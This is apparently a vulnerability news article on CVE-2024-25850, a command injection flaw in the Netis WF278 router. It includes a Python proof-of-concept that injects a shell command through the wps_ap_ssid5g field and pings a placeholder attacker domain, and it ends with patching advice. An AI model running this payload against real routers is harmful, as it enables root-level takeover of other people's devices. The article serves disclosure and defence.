CVE CyberSecurity Database News

CVE-2024-25850 - Command Injection in Netis WF278 v2.1.40144 via wps_ap_ssid5g Parameter

Poster -

Table of Contents

Introduction

Home and small-business routers are prime targets for cyber attackers, largely because they often lack basic security. Netis WF278, a well-known wireless router, recently made headlines due to a critical vulnerability that allows hackers to inject and run system commands. This vulnerability is tracked as CVE-2024-25850 and specifically targets firmware version v2.1.40144.

What is CVE-2024-25850?

CVE-2024-25850 is a command injection flaw found in the web interface of the Netis WF278 router. The bug allows an attacker to inject arbitrary system commands by manipulating a specific setting, wps_ap_ssid5g. This vulnerability can be exploited remotely, if the web management panel is exposed to the internet or LAN.

Technical Details & Vulnerable Parameter

When a user sets the SSID for the 5GHz WiFi band (wps_ap_ssid5g parameter) via the web interface, the device backend fails to properly sanitize the input. If a crafted string with a command (e.g., ;reboot) is sent, the command gets executed with root privileges.

Typical vulnerable endpoint

/goform/wps

Affected parameter

wps_ap_ssid5g

Find the router on your network:

Make sure you can access the Netis management interface (usually http://192.168.1.1/).

Code Snippet -- Command Injection Exploit

Here’s a simple Python proof-of-concept using requests to exploit the vulnerability and make the device ping a remote server (can be replaced with any Linux command):

import requests

# Replace with your router's IP
url = "http://192.168.1.1/goform/wps"

# Login session if auth needed (optional)
session = requests.Session()
# session.post("http://192.168.1.1/login", data={"username":"admin", "password":"admin"})

payload = "MyWiFi; ping -c 3 attacker-domain.com #"

data = {
    "wps_ap_ssid5g": payload,
    # other required parameters ...
}

# Optional: headers, authentication, cookies if needed
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

response = session.post(url, data=data, headers=headers)

print(f"Status: {response.status_code}")
if response.status_code == 200:
    print("Payload sent! Check your attack endpoint for pings.")
else:
    print("Failed to send payload.")

Replace "attacker-domain.com" with your own controlled host to catch the ping and verify code execution.

Original advisories and research

- NVD - CVE-2024-25850
- GitHub security advisory *(if available)*
- Full Exploit Writeup (archive.is)

*Note: Please always verify links and research updates directly from Netis or official vulnerability trackers.*

How to Protect Yourself

- Update Firmware: Check Netis Support Page

Monitor Unusual Behavior: Watch for sudden reboots or DNS changes.

If official fixes are unavailable:
Consider replacing your router with a model that receives regular security updates.

Conclusion

CVE-2024-25850 is a severe bug that exemplifies how poor input handling can lead to a complete device takeover. If you manage or use Netis WF278 routers, update immediately and secure your device. Remember, even small misconfigurations can have big consequences on your network security.

*Stay safe. Regular device reviews and updates are your first line of defense.*

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 08/22/2024 19:35:16 UTC